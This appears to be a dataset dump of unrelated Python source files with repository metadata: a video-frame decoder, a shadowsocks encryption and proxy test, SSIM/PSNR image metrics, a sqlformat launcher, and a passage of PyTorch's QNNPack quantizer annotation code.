#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import NamedTuple, List
import cv2
from PIL import Image
from towhee.operator import Operator, SharedType
class Cv2Decoder(Operator):
"""
Cv2 decoder
"""
def __init__(self):
super().__init__()
self.key = ()
def __call__(self, video_path: str) -> NamedTuple('Outputs', [('imgs', List['Image'])]):
Outputs = NamedTuple('Outputs', [('imgs', List['Image'])])
imgs = []
cap = cv2.VideoCapture(video_path)
while True:
_, frame = cap.read()
if frame is not None:
imgs.append(Image.fromarray(frame))
else:
cap.release()
return Outputs(imgs)
@property
def shared_type(self):
return SharedType.Shareable
| [
"noreply@github.com"
] | noreply@github.com |
b737b31bed3d603c622f9944ac103af3aedce653 | d3d4af6651c7138f9ce32ddbe95f7a6e00621398 | /small_apps/shadowsocks/test.py | 35d3fafa5c2ad7d81506c7719f12a6ce65d67835 | [] | no_license | mitnk/stuff | 13fdb6a77443e923a9cf55d0a02f405c839b204a | 0ae1d2adbcd28897277ad67bcf02997f428c0b97 | refs/heads/master | 2020-06-26T17:02:10.341565 | 2013-10-22T01:10:48 | 2013-10-22T01:10:48 | 2,129,379 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,210 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import select
import struct
import hashlib
import string
from subprocess import Popen, PIPE
target1 = [
[60, 53, 84, 138, 217, 94, 88, 23, 39, 242, 219, 35, 12, 157, 165, 181, 255, 143, 83, 247, 162, 16, 31, 209, 190,
171, 115, 65, 38, 41, 21, 245, 236, 46, 121, 62, 166, 233, 44, 154, 153, 145, 230, 49, 128, 216, 173, 29, 241, 119,
64, 229, 194, 103, 131, 110, 26, 197, 218, 59, 204, 56, 27, 34, 141, 221, 149, 239, 192, 195, 24, 155, 170, 183, 11
, 254, 213, 37, 137, 226, 75, 203, 55, 19, 72, 248, 22, 129, 33, 175, 178, 10, 198, 71, 77, 36, 113, 167, 48, 2,
117, 140, 142, 66, 199, 232, 243, 32, 123, 54, 51, 82, 57, 177, 87, 251, 150, 196, 133, 5, 253, 130, 8, 184, 14,
152, 231, 3, 186, 159, 76, 89, 228, 205, 156, 96, 163, 146, 18, 91, 132, 85, 80, 109, 172, 176, 105, 13, 50, 235,
127, 0, 189, 95, 98, 136, 250, 200, 108, 179, 211, 214, 106, 168, 78, 79, 74, 210, 30, 73, 201, 151, 208, 114, 101,
174, 92, 52, 120, 240, 15, 169, 220, 182, 81, 224, 43, 185, 40, 99, 180, 17, 212, 158, 42, 90, 9, 191, 45, 6, 25, 4
, 222, 67, 126, 1, 116, 124, 206, 69, 61, 7, 68, 97, 202, 63, 244, 20, 28, 58, 93, 134, 104, 144, 227, 147, 102,
118, 135, 148, 47, 238, 86, 112, 122, 70, 107, 215, 100, 139, 223, 225, 164, 237, 111, 125, 207, 160, 187, 246, 234
, 161, 188, 193, 249, 252],
[151, 205, 99, 127, 201, 119, 199, 211, 122, 196, 91, 74, 12, 147, 124, 180, 21, 191, 138, 83, 217, 30, 86, 7, 70,
200, 56, 62, 218, 47, 168, 22, 107, 88, 63, 11, 95, 77, 28, 8, 188, 29, 194, 186, 38, 198, 33, 230, 98, 43, 148,
110, 177, 1, 109, 82, 61, 112, 219, 59, 0, 210, 35, 215, 50, 27, 103, 203, 212, 209, 235, 93, 84, 169, 166, 80, 130
, 94, 164, 165, 142, 184, 111, 18, 2, 141, 232, 114, 6, 131, 195, 139, 176, 220, 5, 153, 135, 213, 154, 189, 238
, 174, 226, 53, 222, 146, 162, 236, 158, 143, 55, 244, 233, 96, 173, 26, 206, 100, 227, 49, 178, 34, 234, 108,
207, 245, 204, 150, 44, 87, 121, 54, 140, 118, 221, 228, 155, 78, 3, 239, 101, 64, 102, 17, 223, 41, 137, 225, 229,
66, 116, 171, 125, 40, 39, 71, 134, 13, 193, 129, 247, 251, 20, 136, 242, 14, 36, 97, 163, 181, 72, 25, 144, 46,
175, 89, 145, 113, 90, 159, 190, 15, 183, 73, 123, 187, 128, 248, 252, 152, 24, 197, 68, 253, 52, 69, 117, 57, 92,
104, 157, 170, 214, 81, 60, 133, 208, 246, 172, 23, 167, 160, 192, 76, 161, 237, 45, 4, 58, 10, 182, 65, 202, 240,
185, 241, 79, 224, 132, 51, 42, 126, 105, 37, 250, 149, 32, 243, 231, 67, 179, 48, 9, 106, 216, 31, 249, 19, 85,
254, 156, 115, 255, 120, 75, 16]]
target2 = [
[124, 30, 170, 247, 27, 127, 224, 59, 13, 22, 196, 76, 72, 154, 32, 209, 4, 2, 131, 62, 101, 51, 230, 9, 166, 11, 99
, 80, 208, 112, 36, 248, 81, 102, 130, 88, 218, 38, 168, 15, 241, 228, 167, 117, 158, 41, 10, 180, 194, 50, 204,
243, 246, 251, 29, 198, 219, 210, 195, 21, 54, 91, 203, 221, 70, 57, 183, 17, 147, 49, 133, 65, 77, 55, 202, 122,
162, 169, 188, 200, 190, 125, 63, 244, 96, 31, 107, 106, 74, 143, 116, 148, 78, 46, 1, 137, 150, 110, 181, 56, 95,
139, 58, 3, 231, 66, 165, 142, 242, 43, 192, 157, 89, 175, 109, 220, 128, 0, 178, 42, 255, 20, 214, 185, 83, 160,
253, 7, 23, 92, 111, 153, 26, 226, 33, 176, 144, 18, 216, 212, 28, 151, 71, 206, 222, 182, 8, 174, 205, 201, 152,
240, 155, 108, 223, 104, 239, 98, 164, 211, 184, 34, 193, 14, 114, 187, 40, 254, 12, 67, 93, 217, 6, 94, 16, 19, 82
, 86, 245, 24, 197, 134, 132, 138, 229, 121, 5, 235, 238, 85, 47, 103, 113, 179, 69, 250, 45, 135, 156, 25, 61,
75, 44, 146, 189, 84, 207, 172, 119, 53, 123, 186, 120, 171, 68, 227, 145, 136, 100, 90, 48, 79, 159, 149, 39, 213,
236, 126, 52, 60, 225, 199, 105, 73, 233, 252, 118, 215, 35, 115, 64, 37, 97, 129, 161, 177, 87, 237, 141, 173, 191
, 163, 140, 234, 232, 249],
[117, 94, 17, 103, 16, 186, 172, 127, 146, 23, 46, 25, 168, 8, 163, 39, 174, 67, 137, 175, 121, 59, 9, 128, 179, 199
, 132, 4, 140, 54, 1, 85, 14, 134, 161, 238, 30, 241, 37, 224, 166, 45, 119, 109, 202, 196, 93, 190, 220, 69, 49
, 21, 228, 209, 60, 73, 99, 65, 102, 7, 229, 200, 19, 82, 240, 71, 105, 169, 214, 194, 64, 142, 12, 233, 88, 201
, 11, 72, 92, 221, 27, 32, 176, 124, 205, 189, 177, 246, 35, 112, 219, 61, 129, 170, 173, 100, 84, 242, 157, 26,
218, 20, 33, 191, 155, 232, 87, 86, 153, 114, 97, 130, 29, 192, 164, 239, 90, 43, 236, 208, 212, 185, 75, 210, 0,
81, 227, 5, 116, 243, 34, 18, 182, 70, 181, 197, 217, 95, 183, 101, 252, 248, 107, 89, 136, 216, 203, 68, 91, 223,
96, 141, 150, 131, 13, 152, 198, 111, 44, 222, 125, 244, 76, 251, 158, 106, 24, 42, 38, 77, 2, 213, 207, 249, 147,
113, 135, 245, 118, 193, 47, 98, 145, 66, 160, 123, 211, 165, 78, 204, 80, 250, 110, 162, 48, 58, 10, 180, 55, 231,
79, 149, 74, 62, 50, 148, 143, 206, 28, 15, 57, 159, 139, 225, 122, 237, 138, 171, 36, 56, 115, 63, 144, 154, 6,
230, 133, 215, 41, 184, 22, 104, 254, 234, 253, 187, 226, 247, 188, 156, 151, 40, 108, 51, 83, 178, 52, 3, 31, 255,
195, 53, 235, 126, 167, 120]]
def get_table(key):
m = hashlib.md5()
m.update(key)
s = m.digest()
(a, b) = struct.unpack('<QQ', s)
table = [c for c in string.maketrans('', '')]
for i in xrange(1, 1024):
table.sort(lambda x, y: int(a % (ord(x) + i) - a % (ord(y) + i)))
return table
encrypt_table = ''.join(get_table('foobar!'))
decrypt_table = string.maketrans(encrypt_table, string.maketrans('', ''))
for i in range(0, 256):
assert(target1[0][i] == ord(encrypt_table[i]))
assert(target1[1][i] == ord(decrypt_table[i]))
encrypt_table = ''.join(get_table('barfoo!'))
decrypt_table = string.maketrans(encrypt_table, string.maketrans('', ''))
for i in range(0, 256):
assert(target2[0][i] == ord(encrypt_table[i]))
assert(target2[1][i] == ord(decrypt_table[i]))
p1 = Popen(['python', 'server.py'], shell=False, bufsize=0, stdin=PIPE,
stdout=PIPE, stderr=PIPE, close_fds=True)
p2 = Popen(['python', 'local.py'], shell=False, bufsize=0, stdin=PIPE,
stdout=PIPE, stderr=PIPE, close_fds=True)
p3 = None
print 'encryption test passed'
try:
ready_count = 0
fdset = [p1.stdout, p2.stdout, p1.stderr, p2.stderr]
while True:
r, w, e = select.select(fdset, [], fdset)
if e:
break
for fd in r:
line = fd.readline()
sys.stdout.write(line)
if line.find('starting server at port') >= 0:
ready_count += 1
if ready_count == 2 and p3 is None:
p3 = Popen(['curl', 'http://www.example.com/', '-v', '-L',
'--socks5-hostname', '127.0.0.1:1080'], shell=False,
bufsize=0, close_fds=True)
break
if p3 is not None:
r = p3.wait()
if r == 0:
print 'test passed'
sys.exit(r)
finally:
for p in [p1, p2]:
try:
p.kill()
except OSError:
pass
sys.exit(-1)
| [
"whgking@gmail.com"
] | whgking@gmail.com |
bc17a9d243eee1fad950c7533e64a53420bef524 | 63c446e6ca949540d96bb8ebaecb48d68d6f933e | /evaluation.py | 67d5454dc5faa2019f32b91a850886f69ff4226e | [] | no_license | scott-mao/MMNet | 5dcb54aa26f483a474c4909fa27c6061c6540af5 | 29a39094d5ff8ee1ae24e09d22b77b6fa92d3fa2 | refs/heads/main | 2023-03-26T09:03:17.103023 | 2021-03-29T01:39:45 | 2021-03-29T01:39:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,828 | py | import torch
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
from math import exp
from math import log10
def gaussian(window_size, sigma):
gauss = torch.Tensor([exp(-(x - window_size // 2) ** 2 / float(2 * sigma ** 2)) for x in range(window_size)])
return gauss / gauss.sum()
def create_window(window_size, channel):
_1D_window = gaussian(window_size, 1.5).unsqueeze(1)
_2D_window = _1D_window.mm(_1D_window.t()).float().unsqueeze(0).unsqueeze(0)
window = Variable(_2D_window.expand(channel, 1, window_size, window_size).contiguous())
return window
def _ssim(img1, img2, window, window_size, channel, size_average=True):
mu1 = F.conv2d(img1, window, padding=window_size // 2, groups=channel)
mu2 = F.conv2d(img2, window, padding=window_size // 2, groups=channel)
mu1_sq = mu1.pow(2)
mu2_sq = mu2.pow(2)
mu1_mu2 = mu1 * mu2
sigma1_sq = F.conv2d(img1 * img1, window, padding=window_size // 2, groups=channel) - mu1_sq
sigma2_sq = F.conv2d(img2 * img2, window, padding=window_size // 2, groups=channel) - mu2_sq
sigma12 = F.conv2d(img1 * img2, window, padding=window_size // 2, groups=channel) - mu1_mu2
C1 = 0.01 ** 2
C2 = 0.03 ** 2
ssim_map = ((2 * mu1_mu2 + C1) * (2 * sigma12 + C2)) / ((mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2))
if size_average:
return ssim_map.mean()
else:
return ssim_map.mean(1).mean(1).mean(1)
def _binarize(y_data, threshold):
y_data[y_data < threshold] = 0.0
y_data[y_data >= threshold] = 1.0
return y_data
'''
def psnr(y_pred, y_true, dim=1, threshold=None):
if threshold:
y_pred = _binarize(y_pred, threshold)
mse = torch.mean((y_pred - y_true) ** 2)
psnr=10 * torch.log10(1 / mse)
return psnr.cpu().data.numpy'''
def ssim(img1, img2, window_size=11, size_average=False):
_, channel, h, w = img1.size()
img1_ = img1[:, :, 8: -8, 8: -8]
img2_ = img2[:, :, 8: -8, 8: -8]
window = create_window(window_size, channel)
if img1.is_cuda:
window = window.cuda(img1_.get_device())
window = window.type_as(img1_)
return _ssim(img1_, img2_, window, window_size, channel, size_average)
def psnr(img1, img2):
img1 = (img1 * 255.0).int()
img2 = (img2 * 255.0).int()
img1 = img1.float() / 255.0
img2 = img2.float() / 255.0
mse = torch.mean((img1 - img2) ** 2)
psnr = 10 * log10(1 / mse)
return psnr
def psnr2(img1, img2):
img1 = (img1 * 255.0).int()
img2 = (img2 * 255.0).int()
img1 = img1.float() / 255.0
img2 = img2.float() / 255.0
img1_ = img1[:, :, 8: -8, 8: -8]
img2_ = img2[:, :, 8: -8, 8: -8]
mse = torch.sum((img1_ - img2_) ** 2, [1, 2, 3]) / img1_[0, ...].numel()
out = 10 * torch.log10(1 / mse)
return out
| [
"anchen@mail.ustc.edu.cn"
] | anchen@mail.ustc.edu.cn |
3b603298800ea6f63d1d96d118d1723a81b7ee5d | c938d327ae20123ae0947e8f0a14e295bf93ed4e | /virtual/bin/sqlformat | 1c8fd84119a939063491ebcf81c981ad76ca49de | [
"MIT"
] | permissive | Kennedy-karuri/Awards | 54a4c5ef975cfb7fb757f56eee449cd5b850aa8d | 833ecad6e9d491a10b61a733a4c2f0b31d0b8b00 | refs/heads/master | 2023-02-28T09:35:21.111483 | 2021-01-26T23:22:19 | 2021-01-26T23:22:19 | 332,387,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | #!/home/moringaaccess/Desktop/awards/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from sqlparse.__main__ import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"kennkaruri99@gmail.com"
] | kennkaruri99@gmail.com | |
a2bd66f70a6a7d7e1b9e8f3c16a7f2d37623a9d3 | 7ed4a49fd0906ed156c1846c9c9fc1dd94c47303 | /torch/ao/quantization/_pt2e/quantizer/qnnpack_quantizer.py | 10880f20705bdbe4aa55d8602e9370acf9c72230 | [
"BSD-2-Clause",
"LicenseRef-scancode-secret-labs-2011",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0"
] | permissive | XinYao1994/pytorch | e052f2f44acf623da9d5ebc6b46f68311e73d66a | 351c2ea2fbb09add93980e2942435f31b114047c | refs/heads/master | 2023-05-27T17:20:51.876780 | 2023-05-21T06:31:53 | 2023-05-21T06:31:53 | 153,064,994 | 1 | 0 | null | 2018-10-15T06:42:28 | 2018-10-15T06:42:28 | null | UTF-8 | Python | false | false | 25,134 | py | from __future__ import annotations
import copy
import functools
import operator
from typing import Callable, Dict, List, Optional, Set
import torch
import torch._dynamo as torchdynamo
import torch.nn.functional as F
from torch.ao.quantization._pt2e.quantizer.utils import (
get_act_obs_or_fq_ctr,
get_bias_obs_or_fq_ctr,
get_weight_obs_or_fq_ctr,
)
from torch.ao.quantization.observer import PlaceholderObserver
from torch.fx import Node
from torch.fx.passes.utils.source_matcher_utils import get_source_partitions
from .quantizer import (
OperatorConfig,
OperatorPatternType,
QuantizationConfig,
QuantizationSpec,
Quantizer,
QuantizationAnnotation,
_annotate_input_qspec_map,
_annotate_output_qspec,
)
# Public API of this module.
__all__ = [
    "QNNPackQuantizer",
    "get_symmetric_quantization_config",
]

# Registry populated by ``register_annotator``: maps a QuantizationConfig to a
# ``functools.partial`` of the annotator function with that config bound in.
_QUANT_CONFIG_TO_ANNOTATOR = {}
def _mark_nodes_as_annotated(nodes: List[Node]):
    """Mark every non-None node in ``nodes`` as annotated.

    Nodes that do not yet carry a "quantization_annotation" meta entry get a
    fresh (empty) QuantizationAnnotation before the ``_annotated`` flag is set.
    """
    for node in nodes:
        if node is None:
            continue
        meta = node.meta
        if "quantization_annotation" not in meta:
            meta["quantization_annotation"] = QuantizationAnnotation()
        meta["quantization_annotation"]._annotated = True
def _get_dynamo_graph(function: Callable, inputs) -> torch.fx.Graph:
    """Trace ``function`` with dynamo into an aten-level FX graph.

    Dead code is eliminated from the traced graph before it is returned.
    """
    graph_module, _guards = torchdynamo.export(function, *inputs, aten_graph=True)
    graph_module.graph.eliminate_dead_code()
    return graph_module.graph
def _get_linear_patterns(input_size: List[int]):
    """Build aten-level graph patterns for ``F.linear``.

    Returns two traced graphs: linear with bias and linear without bias.
    ``input_size`` determines the activation shape; its last dimension is the
    number of input features.
    """
    out_features = 8  # arbitrary value; the traced pattern should not depend on it
    in_features = input_size[-1]
    weight = torch.ones((out_features, in_features))
    bias = torch.ones((out_features,))
    act = torch.ones(input_size)

    def linear_op(act, weight, bias=None):
        return F.linear(act, weight, bias)

    with_bias = _get_dynamo_graph(linear_op, (act, weight, bias))
    without_bias = _get_dynamo_graph(linear_op, (act, weight))
    return [with_bias, without_bias]
def register_annotator(quantization_configs: List[QuantizationConfig]):
    """Decorator factory: register the decorated function as the annotator for
    each config in ``quantization_configs``.

    Each registry entry is ``functools.partial(fn, config=config)`` so the
    annotator can later be called without re-supplying its config.

    Raises:
        KeyError: if any of the configs already has a registered annotator.
    """

    def decorator(fn: Callable) -> Callable:
        for quantization_config in quantization_configs:
            if quantization_config in _QUANT_CONFIG_TO_ANNOTATOR:
                raise KeyError(
                    f"Annotator for quantization config {quantization_config} is already registered"
                )
            _QUANT_CONFIG_TO_ANNOTATOR[quantization_config] = functools.partial(
                fn, config=quantization_config
            )
        # Bug fix: previously the decorator implicitly returned None, which
        # rebound the decorated name to None. Return the original function so
        # it remains directly callable after decoration.
        return fn

    return decorator
def supported_symmetric_quantized_operators() -> Dict[str, List[OperatorPatternType]]:
    """Map each supported operator name to the module/functional patterns that
    can be quantized with a symmetric config.

    A deep copy is returned so callers may mutate the result freely.
    """
    patterns: Dict[str, List[OperatorPatternType]] = {}
    # Both conv and linear should be able to handle relu + hardtanh fusion,
    # since those are clamp ops.
    patterns["conv2d"] = [
        [torch.nn.Conv2d, torch.nn.ReLU],
        [torch.nn.Conv2d, F.relu],
        [F.conv2d, torch.nn.ReLU],
        [F.conv2d, F.relu],
    ]
    patterns["linear"] = [[torch.nn.Linear], [F.linear]]
    patterns["add"] = [[torch.add]]
    patterns["maxpool2d"] = [[torch.nn.MaxPool2d], [F.max_pool2d]]
    patterns["hardtanh"] = [[torch.nn.Hardtanh], [F.hardtanh]]
    patterns["mean"] = [[torch.mean]]
    patterns["adaptive_avgpool2d"] = [
        [torch.nn.AdaptiveAvgPool2d],
        [F.adaptive_avg_pool2d],
    ]
    return copy.deepcopy(patterns)
def get_supported_symmetric_config_and_operators() -> List[OperatorConfig]:
    """Enumerate every symmetric quantization config (all four combinations of
    per-channel x QAT) paired with each operator pattern list it supports.

    A deep copy is returned so callers may mutate the result freely.
    """
    supported: List[OperatorConfig] = []
    for is_per_channel in (False, True):
        for is_qat in (False, True):
            qconfig = get_symmetric_quantization_config(
                is_per_channel=is_per_channel, is_qat=is_qat
            )
            for pattern_list in supported_symmetric_quantized_operators().values():
                supported.append(OperatorConfig(qconfig, pattern_list))
    return copy.deepcopy(supported)
@functools.lru_cache
def get_symmetric_quantization_config(
    is_per_channel: bool = False,
    is_qat: bool = False,
):
    """Build a QuantizationConfig for symmetric int8 quantization.

    * Activations: per-tensor affine int8 in [-128, 127], static.
    * Weights: symmetric int8 in [-127, 127]; per-channel along axis 0 when
      ``is_per_channel`` is True, per-tensor otherwise.
    * Bias: left in float.

    Results are memoized, so equal argument combinations share one config
    object.
    """
    activation_spec = QuantizationSpec(
        dtype=torch.int8,
        quant_min=-128,
        quant_max=127,
        qscheme=torch.per_tensor_affine,
        is_dynamic=False,
    )

    if is_per_channel:
        weight_qscheme = torch.per_channel_symmetric
    else:
        weight_qscheme = torch.per_tensor_symmetric
    weight_spec = QuantizationSpec(
        dtype=torch.int8,
        quant_min=-127,
        quant_max=127,
        qscheme=weight_qscheme,
        ch_axis=0,
        is_dynamic=False,
    )

    bias_spec = QuantizationSpec(dtype=torch.float)

    return QuantizationConfig(activation_spec, weight_spec, bias_spec, is_qat)
def get_supported_config_and_operators() -> List[OperatorConfig]:
    """Return all supported (config, operators) pairs; currently these are
    exactly the symmetric ones."""
    symmetric_configs_and_ops = get_supported_symmetric_config_and_operators()
    return symmetric_configs_and_ops
def _get_default_obs_or_fq_ctr():
return PlaceholderObserver.with_args(dtype=torch.float)
def _is_annotated(nodes: List[Node]):
"""
Given a list of nodes (that represents an operator pattern),
check if any of the node is annotated, return True if any of the node
is annotated, otherwise return False
"""
annotated = False
for node in nodes:
annotated = annotated or (
"quantization_annotation" in node.meta
and node.meta["quantization_annotation"]._annotated
)
return annotated
class QNNPackQuantizer(Quantizer):
    """Quantizer that annotates an exported FX graph for QNNPack-style
    symmetric int8 quantization (PTQ or QAT, per-tensor or per-channel
    weights).

    ``annotate`` walks the graph and attaches ``QuantizationAnnotation``
    metadata to matched operator patterns; the prepare step later inserts
    observers / fake-quants driven by those annotations.
    """

    # Static table of (quantization_config, operator_patterns) pairs this
    # quantizer supports; shared by all instances.
    supported_config_and_operators = get_supported_config_and_operators()

    def __init__(self):
        super().__init__()
        # Set via set_global(); annotate() assumes it has been set.
        self.global_config: QuantizationConfig = None  # type: ignore[assignment]
        # Per-operator-type overrides (recorded but not yet consumed by annotate()).
        self.operator_type_config: Dict[str, Optional[QuantizationConfig]] = {}

    @classmethod
    def get_supported_quantization_configs(cls) -> List[QuantizationConfig]:
        """Return the distinct quantization configs among the supported pairs."""
        op_configs: Set[QuantizationConfig] = set({})
        for spec, _ in cls.supported_config_and_operators:
            op_configs.add(spec)
        return list(op_configs)

    @classmethod
    def get_supported_operator_for_quantization_config(
        cls, quantization_config: Optional[QuantizationConfig]
    ) -> List[OperatorPatternType]:
        """Return the operator patterns supported under ``quantization_config``.

        ``None`` means "any config": all patterns are returned. An unknown
        config yields an empty list.
        """
        if quantization_config is None:
            all_ops = []
            for _, ops in cls.supported_config_and_operators:
                all_ops.extend(ops)
            return all_ops
        for config, ops in cls.supported_config_and_operators:
            # note: this assumes each entry in cls.supported_spec_and_operators
            # corresponds to one spec, e.g. we don't have
            # [(spec1, op_list1), (spec1, op_list2), (spec2, op_list3)]
            # where the first and second entry have the same spec but did not
            # merge the op list
            if config == quantization_config:
                return ops
        return []

    def set_global(self, quantization_config: QuantizationConfig) -> QNNPackQuantizer:
        """Set the config applied to every supported operator; returns self."""
        self.global_config = quantization_config
        return self

    def set_config_for_operator_type(
        self, operator_type: str, quantization_config: QuantizationConfig
    ) -> QNNPackQuantizer:
        """Record a per-operator-type override; returns self for chaining."""
        self.operator_type_config[operator_type] = quantization_config
        return self

    def annotate(self, model: torch.fx.GraphModule) -> torch.fx.GraphModule:
        """just handling global spec for now"""
        global_config = self.global_config
        # Dispatch to the annotator registered for this config (see
        # @register_annotator below).
        _QUANT_CONFIG_TO_ANNOTATOR[global_config](self, model)
        return model

    @register_annotator(
        [
            get_symmetric_quantization_config(is_per_channel=False, is_qat=False),
            get_symmetric_quantization_config(is_per_channel=False, is_qat=True),
            get_symmetric_quantization_config(is_per_channel=True, is_qat=True),
            get_symmetric_quantization_config(is_per_channel=True, is_qat=False),
        ]
    )
    def annotate_symmetric_config(
        self, model: torch.fx.GraphModule, config: QuantizationConfig
    ) -> torch.fx.GraphModule:
        """Annotate every supported pattern in ``model`` under ``config``."""
        # annotate the nodes from last to first since the matching is in the reversed order
        # and fusion operator patterns (conv - relu) can get matched before single operator pattern (conv)
        # and we will mark the matched node with "_annotated" so fusion operator pattern
        # can take precedence over single operator pattern in this way
        self._annotate_linear(model, config)
        for node in reversed(model.graph.nodes):
            # one improvement is to register node annotators for each
            # supported op type.
            if config.is_qat:
                # conv+bn(+relu) patterns only exist before bn fusion, i.e. QAT.
                self._annotate_conv2d_bn_relu(node, config)
                self._annotate_conv2d_bn(node, config)
            self._annotate_conv2d_relu(node, config)
            self._annotate_conv2d(node, config)
            self._annotate_maxpool2d(node, config)
            self._annotate_add_relu(node, config)
            self._annotate_add(node, config)
            self._annotate_hardtanh(node, config)
            self._annotate_mean(node, config)
            self._annotate_adaptive_avg_pool2d(node, config)
        return model

    def _annotate_conv2d_bn(
        self, node: Node, quantization_config: QuantizationConfig
    ) -> None:
        """
        Match the following pattern:
        ... -> conv -> bn -> getitem[0] -> ...
        Annotate it to get the following pattern after prepare:
        weight -> fq1
        |
        ... -> fq0 -> conv -> bn -> getitem[0] -> fq2 -> ...
        Note: This is only used for QAT. In PTQ, batchnorm should already be fused into the conv.
        """
        # Anchor on the getitem[0] extracting the bn output, then walk
        # backwards through bn -> conv to confirm the full pattern.
        if (
            node.op != "call_function"
            or node.target != operator.getitem
            or node.args[1] != 0
        ):
            return
        getitem_node = node
        bn_node = getitem_node.args[0]
        assert isinstance(bn_node, Node)
        if (
            bn_node.op != "call_function"
            or bn_node.target != torch.ops.aten._native_batch_norm_legit.default
        ):
            return
        conv_node = bn_node.args[0]
        assert isinstance(conv_node, Node)
        if (
            conv_node.op != "call_function"
            or conv_node.target != torch.ops.aten.convolution.default
        ):
            return
        if _is_annotated([getitem_node, bn_node, conv_node]):
            return

        # Observe/fake-quant the conv inputs; only the getitem output gets
        # an output spec so the quant boundary sits after the bn.
        input_qspec_map = {}
        input_act = conv_node.args[0]
        assert isinstance(input_act, Node)
        input_qspec_map[input_act] = get_act_obs_or_fq_ctr(quantization_config)

        weight = conv_node.args[1]
        assert isinstance(weight, Node)
        input_qspec_map[weight] = get_weight_obs_or_fq_ctr(quantization_config)

        bias = conv_node.args[2]
        if isinstance(bias, Node):
            input_qspec_map[bias] = get_bias_obs_or_fq_ctr(quantization_config)

        conv_node.meta["quantization_annotation"] = QuantizationAnnotation(
            input_qspec_map=input_qspec_map,
            _annotated=True
        )
        bn_node.meta["quantization_annotation"] = QuantizationAnnotation(
            _annotated=True
        )
        getitem_node.meta["quantization_annotation"] = QuantizationAnnotation(
            output_qspec=get_act_obs_or_fq_ctr(quantization_config),  # type: ignore[arg-type]
            _annotated=True
        )

    def _annotate_conv2d_bn_relu(
        self, node: Node, quantization_config: QuantizationConfig
    ) -> None:
        """
        Match the following pattern:
        ... -> conv -> bn -> getitem[0] -> relu -> ...
        Annotate it to get the following pattern after prepare:
        weight -> fq1
        |
        ... -> fq0 -> conv -> bn -> getitem[0] -> relu -> fq2 -> ...
        Note: This is only used for QAT. In PTQ, batchnorm should already be fused into the conv.
        """
        # Anchor on the relu, then walk backwards through getitem[0] -> bn -> conv.
        if node.op != "call_function" or node.target not in [
            torch.ops.aten.relu_.default,
            torch.ops.aten.relu.default,
        ]:
            return
        relu_node = node
        getitem_node = relu_node.args[0]
        assert isinstance(getitem_node, Node)
        if (
            getitem_node.op != "call_function"
            or getitem_node.target != operator.getitem
            or getitem_node.args[1] != 0
        ):
            return
        bn_node = getitem_node.args[0]
        assert isinstance(bn_node, Node)
        if (
            bn_node.op != "call_function"
            or bn_node.target != torch.ops.aten._native_batch_norm_legit.default
        ):
            return
        conv_node = bn_node.args[0]
        assert isinstance(conv_node, Node)
        if (
            conv_node.op != "call_function"
            or conv_node.target != torch.ops.aten.convolution.default
        ):
            return
        if _is_annotated([relu_node, getitem_node, bn_node, conv_node]):
            return

        # Inputs are observed at the conv; the output spec lives on the relu
        # so the whole fused pattern shares one quantization boundary.
        input_qspec_map = {}
        input_act = conv_node.args[0]
        assert isinstance(input_act, Node)
        input_qspec_map[input_act] = get_act_obs_or_fq_ctr(quantization_config)

        weight = conv_node.args[1]
        assert isinstance(weight, Node)
        input_qspec_map[weight] = get_weight_obs_or_fq_ctr(quantization_config)

        bias = conv_node.args[2]
        if isinstance(bias, Node):
            input_qspec_map[bias] = get_bias_obs_or_fq_ctr(quantization_config)

        conv_node.meta["quantization_annotation"] = QuantizationAnnotation(
            input_qspec_map=input_qspec_map,
            _annotated=True
        )
        bn_node.meta["quantization_annotation"] = QuantizationAnnotation(
            _annotated=True
        )
        getitem_node.meta["quantization_annotation"] = QuantizationAnnotation(
            _annotated=True
        )
        relu_node.meta["quantization_annotation"] = QuantizationAnnotation(
            output_qspec=get_act_obs_or_fq_ctr(quantization_config),  # type: ignore[arg-type]
            _annotated=True
        )

    def _annotate_conv2d_relu(
        self, node: Node, quantization_config: QuantizationConfig
    ) -> None:
        """Annotate the fused conv -> relu pattern (output spec on the relu)."""
        if node.op != "call_function" or node.target not in [
            torch.ops.aten.relu_.default,
            torch.ops.aten.relu.default,
        ]:
            return
        relu_node = node
        conv_node = relu_node.args[0]
        assert isinstance(conv_node, Node)
        if (
            conv_node.op != "call_function"
            or conv_node.target != torch.ops.aten.convolution.default
        ):
            return
        if _is_annotated([relu_node, conv_node]):
            return

        input_qspec_map = {}
        input_act = conv_node.args[0]
        assert isinstance(input_act, Node)
        input_qspec_map[input_act] = get_act_obs_or_fq_ctr(quantization_config)

        weight = conv_node.args[1]
        assert isinstance(weight, Node)
        input_qspec_map[weight] = get_weight_obs_or_fq_ctr(quantization_config)

        bias = conv_node.args[2]
        if isinstance(bias, Node):
            input_qspec_map[bias] = get_bias_obs_or_fq_ctr(quantization_config)

        conv_node.meta["quantization_annotation"] = QuantizationAnnotation(
            input_qspec_map=input_qspec_map,
            _annotated=True
        )
        relu_node.meta["quantization_annotation"] = QuantizationAnnotation(
            output_qspec=get_act_obs_or_fq_ctr(quantization_config),  # type: ignore[arg-type]
            _annotated=True
        )

    def _annotate_conv2d(
        self, node: Node, quantization_config: QuantizationConfig
    ) -> None:
        """Annotate a standalone convolution (input, weight, bias and output)."""
        conv_node = node
        if (
            conv_node.op != "call_function"
            or conv_node.target != torch.ops.aten.convolution.default
        ):
            return
        # skip annotation if it is already annotated
        if _is_annotated([conv_node]):
            return

        input_qspec_map = {}
        input_act = conv_node.args[0]
        assert isinstance(input_act, Node)
        input_qspec_map[input_act] = get_act_obs_or_fq_ctr(quantization_config)

        weight = conv_node.args[1]
        assert isinstance(weight, Node)
